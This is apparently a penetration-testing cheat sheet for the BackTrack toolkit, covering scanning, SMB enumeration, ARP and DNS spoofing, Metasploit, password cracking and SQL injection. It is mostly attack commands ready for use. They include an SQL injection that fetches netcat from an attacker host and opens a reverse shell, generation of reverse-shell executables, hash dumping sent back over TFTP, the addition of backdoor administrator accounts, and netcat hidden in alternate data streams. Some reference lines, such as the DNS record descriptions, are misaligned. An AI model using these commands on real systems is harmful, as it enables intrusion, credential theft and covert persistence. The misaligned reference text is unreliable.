Table of Contents:
I. Networking
II. Services
III. Basics
IV. Foot printing
V. Scanning
VI. Windows Enumeration
VII. ARP Spoofing
VIII. Exploits
IX. Metasploit
What to do after gaining a remote shell
X. TFTP
XI. Netcat
XII. Passwords
XIII. Physical Access
XIV. SQL Injection
XV. Alternate Data Streams
XVI. A White Hat’s Pen Test
Networking:
dhcpcd :get a new IP address
Renew dynamic IP address:
dhcpcd -k :release IP address
ifconfig eth0 up :bring up the NIC
dhcpcd :get a new IP address
Static IP address:
ifconfig eth0 192.168.0.100/24 :set IP address & sub net mask
route add default gw 192.168.0.1 :set default gateway
echo nameserver 192.168.0.1 > /etc/resolv.conf :set DNS server
Backtrack 4 config:
/etc/init.d/networking start :get a new ip address
/etc/init.d/wicd start :start wireless adapter
Services:
Apache server:
apachectl start start server on TCP port 80
apachectl stop stop server
SSH server:
sshd-generate generate ssh keys
/usr/sbin/sshd start server on TCP port 22
pkill sshd stop server
ssh user@targetIP
TFTP server:
atftpd –daemon –port 69 /tmp/ start server on UDP port 69 with a root directory of tmp
pkill tftpd stop server
VNC server:
Vncserver start server on TCP port 5901
pkill Xvnc stop server
Check what ports are listening:
netstat –ant show listening TCP ports
netstat –anu show listening UDP ports
netstat -ant | grep 22 verify ssh has started
netstat -anu | grep 69 verify tftp has started
Basics:
Mount a local hard drive:
mount /dev/hda1 /mnt/hda1
ls -l /mnt/hda1
Mount a Windows network share:
share
share admin 10.1.1.2 c$
Enter a password for the remote share.
ls -l /mnt/share/
umount /mnt/share umount share
Edit a file:
nano test.sh create a new file and open it
x exit
Y save modified buffer
write changes
chmod 755 test.sh make the file executable
./test.sh run the file
Compile a program:
gcc -o newname exploit.c
gcc -o dcom 66.c
./dcom
Install a new program:
tar zxvf program.tar.gz
cd to the new program folder method 2: bzip2 -cd program.tar.bz2 | tar xvf -
./configure
make
su root
make install
Footprinting:
Whois:
whois target.com contact info, emails, dates, name servers
ping www.target.com IP address of web server
whois targetIP network range
DNS:
dig target.com any
A
PTR Host maps a domain to an IP address
NS Pointer maps an IP address to a domain
SOA name Server server name for a delegated zone
SRV start of authority zone transfer and record caching
MX service locator used to locate services in the network
host -l target.com zone transfer
Scanning:
scanrand -b10M targetIP:quick
nmap:
-sS TCP SYN scan or Stealth, half open (default)
-sT TCP full connect (very noisy)
-sU UDP scan
-PS SYN packet discovery (best against stateful firewalls)
-PA ACK packet discovery (best against stateless firewalls)
-PN don’t ping
-n no reverse DNS lookup
-A combines -O and -sV
-O OS fingerprinting
-sV service version (banner)
-p ports to scan (T:port,U:port)
-T timing (0-5) paranoid, sneaky, polite, normal, aggressive, insane
-iL input list of hosts to scan
-oG grepable output to a file
nmap -sS -PN -n targetIP
nmap -sU -PN -n targetIP
nmap -sT -PN -n targetIP -A -p open ports -T5 -oG scan.txt
nmap -sS -p 135,139,445 targetIP
nmap -sS -p T:1433,U:1434 targetIP
amap:
Take the results from nmap and check for services on uncommon ports.
amap -i scan.txt
OS Fingerprinting:
p0f -i eth0 -U –p use interface eth0, don’t display unknown signatures, promiscuous
point a browser to the targetIP read traffic on p0f
xprobe2 targetIP
Banner Grabbing:
nc targetIP port check if the port is open
nc 10.1.1.2 80
telnet targetIP port telnet may yield slightly different results
HEAD /HTTP/1.0
wget targetIP downloads the index.html file
cat index.html | more view file one page at a time, space bar for next page
q exit file
Windows Enumeration:
nmap -sS -p 139,445 targetIP
cd /pentest/enumeration/smb-enum
nbtscan -f targetIP check to see if NetBIOS is enabled
smbgetserverinfo -i targetIP name, OS and workgroup
smbdumpusers -i targetIP list users
smbclient -L //targetIP list shares
Using Windows
net use \\targetIP\ipc$ “” /u:”" start a NULL session
net view \\targetIP view shares
smbclient:
smbclient -L hostName -I targetIP enumerate shares
smbclient -L hostName/share -U “” connect to open share with a blank user name
smbclient -L hostName -I targetIP -U admin connect to open share with user name admin
rpcclient:
rpcclient targetIP -U “” start a NULL session
netshareenum enumerate shares
enumdomusers enumerate users
lsaenumsid enumerate domain SIDs
queryuser RID user info, try 500, 501, 1000, 1001
createdomuser create user account
ARP Spoofing:
ettercap:
nano /usr/local/etc/etter.conf
Under the Linux section, uncomment both lines under iptables.
Sniff > Unified sniffing > Network interface: eth0 > OK
Hosts > Scan for hosts (do this two times)
Hosts > Hosts list
Select the default gateway > Add to Target 1
Select the target > Add to Target 2
Mitm > Arp poisoning > Sniff remote connections > OK
Start > Start sniffing
dsniff -i eth0
urlsnarf -i eth0
msgsnarf -i eth0
driftnet -i eth0
dns spoofing:
nano /usr/local/share/ettercap/etter.dns
Edit the Microsoft lines (target URL) to redirect to the attacker.
Plugins > Manage the plugins > dns_spoof
Mitm > Arp poisoning > Sniff remote connections > OK
Start > Start sniffing
Exploits:
cd /pentest/exploits/milw0rm
cat sploitlist.txt | grep -i [exploit]
Some exploits may be written for compilation under Windows, while others for Linux.
You can identify the environment by inspecting the headers.
cat exploit | grep “#include”
Windows: process.h, string.h, winbase.h, windows.h, winsock2.h
Linux: arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/sockt.h, sys/types.h, unistd.h
Grep out Windows headers, to leave only Linux based exploits:
cat sploitlist.txt | grep -i exploit | cut -d ” ” -f1 | xargs grep sys | cut -d “:” -f1 | sort -u
Metasploit:
svn update update framework
Web Interface:
./msfweb open a browser to 127.0.0.1:55555
Console:
./msfconsole
help
show encoders,nops,exploits,payloads.auxillary
search
use
show options
set set RHOST 192.168.1.3
show payloads
set PAYLOAD
show options
set set LHOST 192.168.1.2
show targets
set TARGET set TARGET 0
exploit
Interactive sessions:
sessions –l list active sessions
sessions -i sessions -i 4, interact with session 4
sessions -k sessions -k 4, kill session 4
z background a session
c kill a session
Jobs list exploit jobs running
jobs –K kill all jobs
Auxiliary scanners:
show auxiliary
use
set
run
scanner/discovery/sweep_udp
scanner/smb/version
scanner/mssql/mssql_ping
scanner/mssql/mssql_login
Payloads:
Attacker behind firewall: bind shell
Target behind firewall: reverse shell
Meterpreter
Automated:
db_import_nessus_nbe import Nessus results in NBE format
db_import_nmap_xml import nmap results in XML format (-oX)
cd /pentest/exploit/framework3
./msfconsole
load db_sqlite3
db_destroy pentest delete old database called pentest
db_create pentest create a new database call pentest
db_nmap targetIP run nmap through the framework and store results in database
db_hosts show hosts discovered
db_services show services running on each host
db_autopwn show options
db_autopwn -t -p –e select modules based on open ports, show matching exploits, exploit
Command Line Interface:
./msfcli | grep -i search for an exploit or auxiliary
./msfcli S summary info
./msfcli = PAYLOAD= E
Payload generator:
./msfpayload
S summary and options of payload
C C language
P Perl
y Ruby
R Raw, allows payload to be piped into msfencode and other tools
J JavaScript
X Windows executable
./msfpayload windows/shell/reverse_tcp LHOST=10.1.1.1 C
./msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=4444 X > evil.exe
Encode shellcode:
./msfencode
Pipe the output of msfpayload into msfencode, show bad characters and list available encoders.
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b ‘\x00′ -l
Choose the PexFnstenvMor encoder and format the output to C.
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b ‘\x00′ -e PexFnstenvMor -t c
What to do after gaining a remote shell:
Hostname name of computer
net users list users
net user x hack /add add user “x” with password “hack”
net user x /add add user “x” with NO password
net localgroup list security groups
net localgroup administrators list users in Administrators group
net localgroup administrators x /add add user “x” to Administrators group
Don’t use interactive programs like FTP from a remote shell
TFTP:
attack box 10.1.1.2
cp /pentest/windows-binaries/tools/nc.exe /tmp/
target box
tftp -i 10.1.1.2 GET nc.exe
TFTP copies files with read only attributes. So to delete the file:
attrib -r nc.exe
del nc.exe
Netcat:
attacker: 10.1.1.1
target: 10.1.1.2
Port scanner:
nc -v -z 10.1.1.2 1-1024 scan ports 1 to 1024
Chat session:
target: nc -lvp 4444 start Netcat and listen verbosely on port 4444
attacker: nc -v 10.1.1.2 4444
Transfer file to target:
target: nc -lvp 4444 > output.txt
attacker: nc -v 10.1.1.2 4444 words
cat words | wc -l
About 306,000 passwords.
Brute force:
ftp with a user name ftp
hydra -l ftp -P words -v targetIP ftp
pop3 with a user name muts
hydra -l muts -P words -v targetIP pop3
snmp
hydra -P words -v targetIP snmp
Microsoft VPN
nmap -p 1723 targetIP
dos2unix words
cat words | thc-pptp-bruter targetIP
WYD:
Use wget to download specific files.
wget -r www.target.com –accept=pdf -f switch will read pwdump files
wyd.pl -o output.txt www.target.com/
cat output.txt | more
SAM file:
%SYSTEMROOT%/system32/config
%SYSTEMROOT%/repair backup copy not locked by the OS
Dumping hashes:
./msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=targetIP PAYLOAD=windows/meterpreter/bind_tcp E
meterpreter > upload -r /tmp/pwdump6 c:\\windows\\system32\\
meterpreter > execute -f cmd -c
meterpreter > interact x Where x is Channel created
C:\WINDOWS\system32> pwdump \\127.0.0.1
John the Ripper:
Paste the hashes into a new file.
nano hash.txt
Delete unneeded accounts.
cp hash.txt /pentest/password/john-1.7.2/run/
cd /pentest/password/john-1.7.2/run/
./john hash.txt
Rainbow Tables:
rcrack *.rt -f hash.txt
Physical Access:
Mount a NTFS share in read/write mode:
Boot your box with Backtrack.
mount
umount /mnt/hda1
modprobe fuse
ntfsmount /dev/hda1 /mnt/hda1
mount
ls -l /mnt/hda1
Dump the SAM file:
bkhive /mnt/sda1/WINDOWS/system32/config/system system.txt
samdump2 /mnt/sda1/WINDOWS/system32/config/sam system.txt > hash.txt
cat hash.txt
Modify SAM file directly:
chntpw /mnt/sda1/WINDOWS/system32/config/SAM
Blank the password. *
Do you really wish to change it? y
Write hive files? y
unmount /mnt/sda1
reboot
SQL Injection:
nmap -sS -p 1521 targetIP oracle
nmap -sS -p T:1433,U:1434 targetIP ms sql
Release Version of SqlServer.exe
SQL Server 2000 RTM 2000.80.194.0
SQL Server 2000 SP1 2000.80.384.0
SQL Server 2000 SP2 2000.80.534.0
SQL Server 2000 SP3 2000.80.760.0
SQL Server 2000 SP3a 2000.80.760.0
SQL Server 2000 SP4 2000.80.00.2039
SQL Server 2005 RTM 2005.90.1399
SQL Server 2005 SP1 2005.90.2047
SQL Server 2005 SP2 2005.90.3042
Authentication bypass:
‘ or 1=1– minus minus closes the SQL query, everything after it is ignored
Enumerating table names:
‘ having 1=1–
‘ group by table having 1=1–
‘ group by table, table2 having 1=1–
‘ group by table, table2, table3 having 1=1–
Enumerating column types:
union select sum(column) from table –
union select sum(column2) from table –
Adding data:
‘ ; insert into table values(‘value’,'value2′,’value3′)–
MS SQL stored procedure:
Output the database info into an html file, that you can view with a browser.
‘ ; exec sp_makewebtask “c:\Inetpub\wwwroot\test.html”, “select * from table” ; –
www.target.com/test.html
Run ipconfig on target and write to a file, that you can view with a browser.
‘ or 1=1; exec master..xp_cmdshell ‘ “ipconfig” > c:\Inetpub\wwwroot\test.txt’ ;–
www.target.com/test.txt
Upload netcat and spawn a reverse shell.
‘ or 1=1; exec master..xp_cmdshell ‘ “tftp -i attackIP GET nc.exe && nc.exe attackIP 53 -e cmd.exe’ ; –
attacker: nc -lvp 53
Alternate Data Streams:
Hide netcat inside a text file. Note netcat must be located in the current directory.
echo “This is a test” > test.txt
type nc.exe > test.txt:nc.exe
del nc.exe
start ./test.txt:nc.exe
A White Hat’s Pen Test by Muts:
nslookup
set type=ns
set type=mx
nmap -sS
nmap -sU
nc -v target.com 23
snmpenum
Solarwinds
tftp the router config file
Use a perl script to decrypt the passwords
Find internal mail server in config file.
nc -n internalserver.com 80
Edit config file to open more port on the router, 135,139,445,1000
Use Metasploit to send RPC exploit
tftp -i attackIP GET pwdump4.exe
pwdump4.exe \\127.0.0.1>hashes.txt
tftp -i attackIP PUT hashes.txt
Crack hashes with rainbow table.
Use Remote Desktop to connect to server
